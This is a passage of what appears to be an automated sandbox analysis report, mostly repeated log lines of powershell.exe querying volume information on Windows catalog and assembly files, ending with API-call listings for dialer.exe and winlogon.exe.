Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

4_2_00007FF78AB31C64

Source: C:\Windows\System32\winlogon.exe

Code function: 7_2_00000225DC647A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_00000225DC647A40

